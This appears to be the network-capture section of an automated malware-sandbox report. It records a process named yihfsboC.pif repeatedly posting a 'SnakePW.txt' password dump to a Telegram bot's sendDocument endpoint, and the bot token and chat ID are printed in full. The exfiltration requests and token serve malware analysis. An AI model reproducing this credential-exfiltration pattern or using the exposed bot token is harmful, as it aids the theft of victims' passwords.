                                                                                                                2024-11-26 07:25:23 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 32 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388848,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605922,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.749776149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:23 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dcf44be8900
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:25:23 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 63 66 34 34 62 65 38 39 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0dcf44be8900Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:23 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:23 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:23 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 32 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388850,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605923,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.749781149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:24 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0df0efc49c34
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:24 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 66 30 65 66 63 34 39 63 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0df0efc49c34Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:26 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:25 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:26 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 32 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388852,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605925,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.749786149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:27 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e138cddbc0c
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:27 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 31 33 38 63 64 64 62 63 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e138cddbc0cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:28 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:27 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:28 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 32 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388854,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605927,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.749791149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:29 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e2afe1517dc
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:29 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 32 61 66 65 31 35 31 37 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e2afe1517dcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:32 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:32 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:32 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388856,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605932,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.749793149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:30 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dc19c90c343
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:30 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 63 31 39 63 39 30 63 33 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0dc19c90c343Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:32 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:32 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:32 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388857,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605932,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.749803149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:34 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0de89fac7a38
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:34 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 64 65 38 39 66 61 63 37 61 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0de89fac7a38Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:34 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:34 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:34 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388860,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605934,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.749802149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:34 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e5dbbcfced3
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:34 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 35 64 62 62 63 66 63 65 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0e5dbbcfced3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:34 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:34 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
